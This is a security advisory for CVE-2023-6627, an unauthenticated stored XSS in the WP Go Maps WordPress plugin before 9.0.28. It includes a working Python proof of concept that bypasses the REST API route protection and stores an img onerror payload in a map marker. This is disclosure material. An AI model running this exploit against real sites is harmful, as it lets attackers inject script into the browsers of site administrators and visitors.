WP Go Maps < 9.0.28 – Unauthenticated Stored XSS | CVE 2023-6627

Description

The plugin does not properly protect most of its REST API routes, which attackers can abuse to store malicious HTML/Javascript on the site.

Proof of Concept

Run the following Python script, then visit https://vulnerable-site.tld/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1.

Alternatively, visit the page where the map is displayed after the fact and click on the affected marker to trigger the XSS.
```
import sys
import requests

if len(sys.argv) != 2:
    print(f'{sys.argv[0]} <target_site_root_url>')
    sys.exit()

url = sys.argv[1].rstrip('/')

# Get list of existing markers
res = requests.get(f'{url}/wp-json/wpgmza/v1/markers').json()

if len(res) == 0:
    print('# No markers found! Make sure the plugin is properly setup.')
    sys.exit()

marker_id = res[0]['id']
print(f'# Found marker ID #{marker_id}, using it to demonstrate the exploit')

print('# Tricking the POST section of the endpoint to store our XSS payload..')
body = {
    'address': '<img src="x&quot; onerror=alert(&quot;xss&quot;)//">'
}
requests.post(f'{url}/wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/{marker_id}', data=body)
```